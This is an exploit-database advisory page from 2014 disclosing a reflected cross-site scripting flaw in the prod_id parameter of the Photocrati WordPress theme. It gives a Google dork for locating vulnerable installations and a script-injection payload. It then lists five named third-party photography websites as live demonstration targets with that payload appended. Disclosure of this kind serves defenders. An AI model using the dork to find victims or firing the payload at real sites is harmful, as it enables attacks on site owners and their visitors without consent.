WordPress Photocrati Cross Site Scripting

2014.01.30
Credit: ACC3SS
Risk: Low
Local: No
Remote: No
CVE: N/A
CWE: CWE-79
Dork: inurl:wp-content/themes/photocrati-theme/photocrati-gallery

###################### # Exploit Title : Wordpress Photocrati-theme Cross Site Scripting # Exploit Author : ACC3SS # Vendor Homepage : http://www.photocrati.com # Google Dork : inurl : inurl:wp-content/themes/photocrati-theme/photocrati-gallery # Date : 2014-01-29 # Tested on : Windows 7 ###################### # Location : localhost/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=[Xss] ###################### # Demo : # http://abandonphotography.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id= "/><script>alert(1);</script> # http://remingtonphotographyohio.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id= "/><script>alert(1);</script> # http://stephimals.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id= "/><script>alert(1);</script> # http://justinsweet.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id= "/><script>alert(1);</script> # http://riseupgallery.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id= "/><script>alert(1);</script> ######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top